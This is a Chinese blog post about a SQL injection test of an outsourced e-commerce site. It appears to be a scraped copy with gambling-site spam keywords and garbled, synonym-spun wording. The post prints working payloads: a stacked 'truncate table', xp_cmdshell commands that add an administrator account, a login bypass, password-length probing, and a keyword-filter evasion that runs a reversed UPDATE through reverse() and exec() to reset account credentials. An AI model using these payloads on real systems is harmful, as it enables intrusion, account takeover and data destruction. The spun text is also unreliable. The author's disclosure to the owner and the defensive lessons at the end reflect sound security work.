皇冠直营现金网官方网电子商务网站SQL注入项目实战一例

故事A段:发现整站SQL对外出口:

 

有个对象的网站,由于是外包项目,费城某商厦付出的,某天我帮她检测了一下网站相关境况。

我查看了页面源代码,发现了个惊心动魄的工作,竟然整站打印SQL到Html里,着实吓我一跳:

PS:2年前秋色园连串作品有分享一文是整站SQL打印用于分析网站性能,不过也只是当地优化调试,而服务器上也运用某很是规则才打印。

于是把这赤祼祼的对外祖父开的SQL问题彰显了千古,之后终于撤除了。 

皇冠直营现金网官方网 1

故事B段:错误十分打印了SQL,诱人: 

 

过了略微天,我又抽空看了看:

原始路径为:http://www.xxx.com/s-l—-333.html,我随意加了个引号:

皇冠直营现金网官方网 2 

直白打印SQL?这不是引诱人犯罪么?好吧,当时被诱了须臾间,花了小半天煎熬了一下。

 

故事C段:发现有简短的SQL关键字过滤: 

 

随意加了个“and“条件,发现有过滤一些生死攸关字: 

 皇冠直营现金网官方网 3 

下一场反复检测,发现过滤了:and select,update,delete等关键字。

 

故事D段:发现可以实施自定义语句,但SQL账号似乎并未SA权限或者是倒闭了xp_cmdshell服务: 

于是乎我组了一条truncate table xxx,当然,这是个不设有的表名: 

http://www.xxxx.com/s-l-82900-6'%20%20or%201=1;truncate%20table%20abc;– 

 

试了下,执行到位,没报什么提醒,太害怕了。

既然可以执行自定义语句,这执行下提权语句看看:

http://www.xxxx.com/s-l-82900-6'%20%20or%201=1;exec master..xp_cmdshell ‘net user test 1234
http://www.xxxx.com/s-l-82900-6'%20%20or%201=1;exec master..xp_cmdshell ‘net localgroup administrators test /add

 

发觉没啥提醒,可是账号不起功效,所以臆想sql的账号没有sa权限可以调用xp_cmdshell,其余这里,由于–符号被用来分隔字符串,所以不起效率。

故事E段:发现登陆有肯定的SQL漏洞: 

 

过了点时间,我就不折腾了,我打算注册个账号看看其他意况。 


到了登陆页,发现注册还要绑定手机号,我就不登记了,于是在登陆里随手弄了一个广泛的a’
or 1=1–

皇冠直营现金网官方网 4

仍旧报密码错误,吓自己一跳,表明用户名注入了,只是密码这关错误。 

 

故事F段:发现验证码仍然在库克(Cook)ie里: 

 

经过拦截请求新闻,发现更奇葩的事:

皇冠直营现金网官方网 5

 

验证码仍旧直接放在Cookie里,这。。。

故事G段:破解用户密码: 

 

既然用户名可以注入,为何密码还报错误?

皇冠直营现金网官方网 6

透过荒谬的语法,看了眨眼之间间对方的SQL语句,猜出了主导的代码逻辑:

 

遵照用户名查出了账号音信,取出的数额的密码再和密码比较。

 

结构注入语句,发现密码为md5存储: 

 

既然可以注入,这里就可以进行语句了,于是,使用普通的讲话弄个账号登陆试试。
一起头我构造了尺度:
username=a’  or password=’123456′–&password=123456&verifycode=5020 
设想到用弱密码123456的很多,我就试了下,发现没搞头,本来还想写个爆破弱口令的账号。
新生考虑,这密码,一般都是加密的,所以自己要通晓对方的加密方法。
透过反复社团类似下面的讲话:
username=a’  or len(password)=16–&password=123456&verifycode=5020
终极确定了为md5加密存储。
于是把123456 md5时而改为:
username=a’  or password=’49ba59abbe56e057′–&password=123456&verifycode=5020

 

没悟出,来了个以下坑爹的提醒:

皇冠直营现金网官方网 7 

试了下洋洋个账号,都是这种景观,这指示太坑爹,忽悠了本人。

PS:其实是账号通过了,直接拿回去的Cookie就足以进用户的,然而自己被摇晃了,以为不可用。

回到的Cookie,实际也是加密的,所以,这种方法,看不到手机号,所以不得已直接省略的登陆。

再布局SQL注入语句,创造属于自己的账号和密码: 

于是,我想通过社团更新语句,把某部账号的手机号和密码都更新一下,然后再自己登陆进去。
据此,我就务须实施类似于:update xxx set username=’13811114444′,password=’888888′ where uid=10003
出于过滤掉update,所以从来来是丰盛的,本来打还算编码成16进制折腾,发现转16进制麻烦,也懒的开vs折腾。
于是乎我想到了一个简单的法门,把语句反过来写,再用reverse函数把语句转过来执行。

 

最终就成了以下函数:

username=13430330585′;declare @A varchar(200);set @A=reverse(”’58803303431”=emanresu erehw ”9d4d9c1ac9814f08”=drowssaP tes xxx tadpu’);exec(@A);–&password=88888888&verifycode=2222

 

执行后,发现都是回去“当前账号已结冰,请联系客户”这句大忽悠的话。。。

害的自家试了N个账号,最终拿里面一个登陆了,才意识是健康的。

皇冠直营现金网官方网 8

 

新生告诉了对方有SQL注入漏洞,最终汇报说用SQL工具检测正常,无语。

再后来就示例告诉了对方,修正了这一个漏洞后,我就写文分享了。 

 

 

总结:

1:验证码怎么可以放库克ie里?

2:SQL语句怎么可以肆意打印给人家看?

3:SQL注入检测怎么能光靠工具? 

4:防SQL注入怎么能靠多少个大概的最紧要字过滤?

 

补偿截图:

皇冠直营现金网官方网 9 

相关文章